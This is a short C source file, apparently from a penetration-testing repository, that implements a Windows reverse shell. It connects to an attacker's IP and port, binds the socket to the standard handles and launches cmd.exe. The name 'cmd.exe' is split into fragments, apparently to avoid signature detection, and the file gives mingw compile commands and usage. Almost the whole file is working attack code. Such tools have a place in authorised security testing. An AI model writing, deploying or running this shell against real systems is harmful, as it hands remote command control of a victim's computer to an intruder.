mgeeky-Penetration-Testing-.../windows/revshell.c

72 lines
2.0 KiB
C
Raw Permalink Normal View History

2019-06-28 13:21:31 +02:00
/*
* Shamefully simple reverse shell, totally not OPSEC-safe, proving extremely
* low programming skills. Coded up in couple of minutes.
*
* Compilation:
* - x64
2019-06-28 13:22:06 +02:00
* $ x86_64-w64-mingw32-gcc revshell.c -ffunction-sections -fdata-sections -s -Os -o revshell.exe -Wl,--gc-sections -lws2_32
2019-06-28 13:21:31 +02:00
* - x86
2019-06-28 13:22:06 +02:00
* $ i686-w64-mingw32-gcc revshell.c -ffunction-sections -fdata-sections -s -Os -o revshell.exe -Wl,--gc-sections -lws2_32
2019-06-28 13:21:31 +02:00
*
* Usage:
2019-06-28 13:22:06 +02:00
* cmd> revshell <IP> <PORT> &
2019-06-28 13:21:31 +02:00
*
* Where:
* - ip - remote attacker's server IP
* - port - remote attacker's server PORT
**/
#define WIN32_LEAN_AND_MEAN
#include <winsock2.h>
#include <stdio.h>
#ifdef _MSC_VER
2019-06-28 13:22:06 +02:00
# pragma comment(lib, "ws2_32")
2019-06-28 13:21:31 +02:00
#endif
int main(int argc, char *argv[])
{
WSADATA wsaData;
SOCKET wsock;
struct sockaddr_in sin;
char saddr[16];
if (argc < 3)
{
2019-06-28 13:22:06 +02:00
return 0;
}
2019-06-28 13:21:31 +02:00
2019-06-28 13:22:06 +02:00
const char *hostname = argv[1];
unsigned int port = atoi(argv[2]);
2019-06-28 13:21:31 +02:00
2019-06-28 13:22:06 +02:00
WSAStartup(MAKEWORD(2,2), &wsaData);
wsock = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, (unsigned int)NULL, (unsigned int)NULL);
2019-06-28 13:21:31 +02:00
struct hostent *host = gethostbyname(hostname);
2019-06-28 13:22:06 +02:00
strcpy(saddr, inet_ntoa(*((struct in_addr *)host->h_addr)));
2019-06-28 13:21:31 +02:00
2019-06-28 13:22:06 +02:00
sin.sin_family = AF_INET;
sin.sin_port = htons(port);
sin.sin_addr.s_addr = inet_addr(saddr);
2019-06-28 13:21:31 +02:00
2019-06-28 13:22:06 +02:00
WSAConnect(wsock, (SOCKADDR*)&sin, sizeof(sin), NULL, NULL, NULL, NULL);
if (WSAGetLastError() == 0)
2019-06-28 13:21:31 +02:00
{
2019-06-28 13:22:06 +02:00
STARTUPINFO sinfo = {0};
PROCESS_INFORMATION procinfo = {0};
2019-06-28 13:21:31 +02:00
2019-06-28 13:22:06 +02:00
sinfo.cb = sizeof(sinfo);
sinfo.dwFlags = STARTF_USESTDHANDLES;
sinfo.hStdInput = sinfo.hStdOutput = sinfo.hStdError = (HANDLE)wsock;
2019-06-28 13:21:31 +02:00
2019-06-28 13:22:06 +02:00
char *cmd[4] = { "cm", "d.e", "x", "e" };
char command[8] = "";
snprintf(command, sizeof(command), "%s%s%s%s", cmd[0], cmd[1], cmd[2], cmd[3]);
2019-06-28 13:21:31 +02:00
2019-06-28 13:22:06 +02:00
CreateProcess(NULL, command, NULL, NULL, TRUE, 0, NULL, NULL, &sinfo, &procinfo);
}
2019-06-28 13:21:31 +02:00
return 0;
}